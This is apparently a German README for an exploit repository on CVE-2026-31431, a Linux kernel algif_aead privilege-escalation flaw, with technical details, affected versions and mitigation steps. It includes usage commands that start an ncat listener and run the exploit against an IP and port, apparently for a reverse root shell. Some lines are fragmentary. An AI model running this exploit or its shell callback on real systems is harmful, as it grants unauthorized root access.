
# Lokaler Privilege-Escalation-Exploit für CVE-2026-31431 Lokaler Privilege-Escalation-Exploit für CVE-2026-31431, einen Logikfehler im Linux-Kernel-AF_ALG, der es nicht privilegierten Benutzern ermöglicht, 4 Bytes in den Page Cache zu schreiben und Root-Rechte zu erlangen. Enthält PoC-Skript und Hinweise zur Abschwächung.
Copy Fail ist eine schwerwiegende lokale Privilegieneskalations-Schwachstelle (LPE) im kryptografischen Subsystem des Linux-Kernels (algif_aead). Entdeckt und veröffentlicht von Theori (über ihr KI-gestütztes Schwachstellenforschungs-Tool Xint Code) am 29. April 2026, ermöglicht der Fehler jedem nicht-privilegierten lokalen Benutzer, 4 kontrollierte Bytes in den Page Cache einer beliebigen lesbaren Datei zu schreiben — und dies auszunutzen, um auf praktisch jeder großen Linux-Distribution, die seit 2017 ausgeliefert wurde, Root-Rechte zu erlangen.
Ein funktionierender Proof-of-Concept-Exploit umfasst nur ~732 Bytes Python.
sudo ncat -lvnp PORT
# Mit Python-Skript
python3 CVE-2026-31431-Exploit.py IP PORT
# Kompilierte Binärdatei
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
AF_ALG-Socket und binden Sie ihn an authencesn(hmac(sha256),cbc(aes))Im Wesentlichen ist jede große Linux-Distribution, die seit 2017 veröffentlicht wurde, betroffen.
Aktualisieren Sie Ihren Kernel auf eine Version, die den Fix-Commit fafe0fa2995a enthält. Die meisten großen Distributionen haben aktualisierte Kernel-Pakete veröffentlicht oder veröffentlichen diese gerade.
Falls Sie nicht sofort patchen können:
algif_aead-Modul auf die Blacklist:
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo modprobe -r algif_aead 2>/dev/null
Dieses Repository dient ausschließlich Bildungs- und Verteidigungszwecken. Die hier enthaltenen Informationen sollen Sicherheitsteams dabei helfen, CVE-2026-31431 zu verstehen, zu erkennen und zu entschärfen. Befolgen Sie stets verantwortungsvolle Offenlegungspraktiken und geltende Gesetze.
| Feld | Detail |
|---|
| CVE-ID | CVE-2026-31431 |
| CVSS-Score | 7.8 (HOCH) |
| Typ | Lokale Privilegieneskalation (LPE) |
| Komponente | algif_aead — AF_ALG-Benutzerraum-Krypto-Schnittstelle des Linux-Kernels |
| Grundursache | Logikfehler in der authencesn-AEAD-Vorlage; eine In-Place-Optimierung (Commit 72548b093ee3, Aug. 2017) führt dazu, dass Page-Cache-Seiten in der beschreibbaren Ziel-Scatterlist des Kernels erscheinen |
| Primitive | 4-Byte-kontrollierter Schreibzugriff in den Page Cache einer beliebigen lesbaren Datei |
| Exploit-Mechanismus | AF_ALG-Socket → splice() → Page-Cache-Korruption einer setuid-Binärdatei → Root |
| Race Condition? | ❌ Keine — geradliniger Logikfehler, 100 % zuverlässig |
| Kernel-Offset nötig? | ❌ Nein |
| Fix-Commit | fafe0fa2995a (macht die Optimierung von 2017 rückgängig) |
| Betroffen | Nicht betroffen |
|---|
| Linux-Kernel 4.14 bis 7.0-rc | Kernel vor 4.14 (vor dem Commit von Aug. 2017) |
| Alle 6.18.x vor 6.18.22 | 6.18.22+ (gepatcht) |
| Alle 6.19.x vor 6.19.12 | 6.19.12+ (gepatcht) |